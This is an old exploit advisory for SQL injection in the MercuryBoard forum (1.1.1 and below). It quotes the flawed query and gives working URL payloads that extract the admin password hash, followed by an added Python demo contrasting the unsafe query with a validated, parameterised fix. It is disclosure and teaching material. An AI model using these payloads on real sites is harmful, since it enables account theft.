
zk-mercuryboard.txt

Posted Feb 23, 2005
Authored by Zeelock

Mercury Board versions 1.1.1 and below suffer from SQL injection vulnerabilities. Detailed exploitation provided.

tags | exploit, vulnerability, sql injection
SHA-256 | 23ea46dff8eca495cf9d1561a86e7c38983ac523a335371c8657203321701552


{==============================================================================}
{ [ Zeelock-2005 ] }
{==============================================================================}
{ }
{ M E R C U R Y B O A R D }
{ }
{ [ Critical SQL Injection - Working Exploit ] }
{ }
{ }
{==============================================================================}

Date: 7th February 2005
Version Vulnerable: <= 1.1.1
Version Fixed: 1.1.2

"Validate anything that can be passed. Security lies in the inputs." - zk


Description
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
MercuryBoard is a powerful message board system dedicated to raw speed with a
mixture of features, ease of use, and ease of customization coupled with
expandability, and diverse language services. Now just over two years in the
making, version 1.0.0 is an immensely stable, thoroughly tested, and well
written piece of internet software ready for any webserver, running on PHP
versions as low as 4.0.0 and MySQL versions as low as 3.22.

For more information:

http://www.mercuryboard.com/index.php?a=about



Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Andrea Trivero of Codebug Security (www.codebug.org) found a lot of security
flaws in this code: many XSS issues and some SQL injection.
However, he did not provide a real working exploit.

Looking at the following piece of code in func/post.php we can see that when
the "reply" switch is used and the "qu" variable is present, whatever is passed
in "qu" via GET from the browser goes straight into the SQL query, because it
is not sanitized at all.


--------[ Mercury 1.1.1 original code ]--------------

if (($s == 'reply') && isset($this->get['qu'])) {
    $query = $this->db->fetch("SELECT p.post_text, m.user_name FROM {$this->pre}posts p, {$this->pre}users m WHERE p.post_id={$this->get['qu']} AND p.post_author=m.user_id");

--------[/Mercury 1.1.1 original code ]--------------


Now we can try to inject something:

http://www.site.com/mercuryboard/index.php?a=post&s=reply&t=1&qu=10000%20UNION%20SELECT%20null,null/*

The only thing to keep in mind is that the "t" parameter should refer to a
topic we have permission to reply to, and the "qu" parameter should refer
to a non-existent topic.

If we get no errors, we can go further.

Proof of concept
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.site.com/mercuryboard/index.php?a=post&s=reply&t=1&qu=10000%20UNION%20SELECT%20user_password,user_name%20from%20mb_users%20where%20user_group%20=%201%20limit%201/*

If it works, you should see the admin username and the admin password hash
inside the reply form between the [quote] tags.

Note: during installation you may have chosen a different prefix for the
tables. In that case you need to change the table name in the query
accordingly to retrieve the information from the database.
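To make the defect and its fix concrete, here is an added Python example (not the advisory's or MercuryBoard's own code) that mirrors the func/post.php query against a constructed SQLite fixture: the unsafe form interpolates "qu" exactly as 1.1.1 does, while the hardened form accepts only a plain positive integer and binds it as a query parameter. The tables, rows and hash placeholders are constructed for the example; the mb_ prefix is the one the proof of concept uses.

```python
import re
import sqlite3

# Constructed fixture mirroring the two tables the post.php query touches
# (mb_ is the prefix used in the advisory's PoC; the hashes are placeholders).
SCHEMA = """
CREATE TABLE mb_posts (post_id INTEGER, post_text TEXT, post_author INTEGER);
CREATE TABLE mb_users (user_id INTEGER, user_name TEXT, user_password TEXT, user_group INTEGER);
INSERT INTO mb_users VALUES (1, 'admin', 'ADMIN_HASH_PLACEHOLDER', 1);
INSERT INTO mb_users VALUES (2, 'bob', 'BOB_HASH_PLACEHOLDER', 2);
INSERT INTO mb_posts VALUES (7, 'hello world', 2);
"""

# The "qu" value from the advisory's proof of concept, URL-decoded.
POC_QU = "10000 UNION SELECT user_password,user_name from mb_users where user_group = 1 limit 1/*"


def demo_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def fetch_quote_unsafe(conn, pre, qu):
    """Mirrors the 1.1.1 code: qu is pasted into the SQL string verbatim."""
    sql = (f"SELECT p.post_text, m.user_name FROM {pre}posts p, {pre}users m "
           f"WHERE p.post_id={qu} AND p.post_author=m.user_id")
    return conn.execute(sql).fetchall()


def is_valid_post_id(raw):
    """A post id is a plain positive integer of reasonable length, nothing else."""
    return isinstance(raw, str) and re.fullmatch(r"[1-9][0-9]{0,9}", raw) is not None


def parse_post_id(raw):
    """Hardened input check: reject anything that is not a bare integer."""
    if not is_valid_post_id(raw):
        raise ValueError(f"rejected post id {raw!r}")
    return int(raw)


def fetch_quote_safe(conn, pre, qu):
    """Validated integer plus a bound parameter; pre comes from config, not the user."""
    post_id = parse_post_id(qu)
    sql = (f"SELECT p.post_text, m.user_name FROM {pre}posts p, {pre}users m "
           "WHERE p.post_id=? AND p.post_author=m.user_id")
    return conn.execute(sql, (post_id,)).fetchall()


if __name__ == "__main__":
    db = demo_db()
    print("unsafe:", fetch_quote_unsafe(db, "mb_", POC_QU))
    print("safe:", fetch_quote_safe(db, "mb_", "7"))
```

Running it shows the unsafe query returning the admin row from mb_users instead of a post, while the hardened path serves the legitimate quote and raises ValueError on the PoC value before any SQL is built.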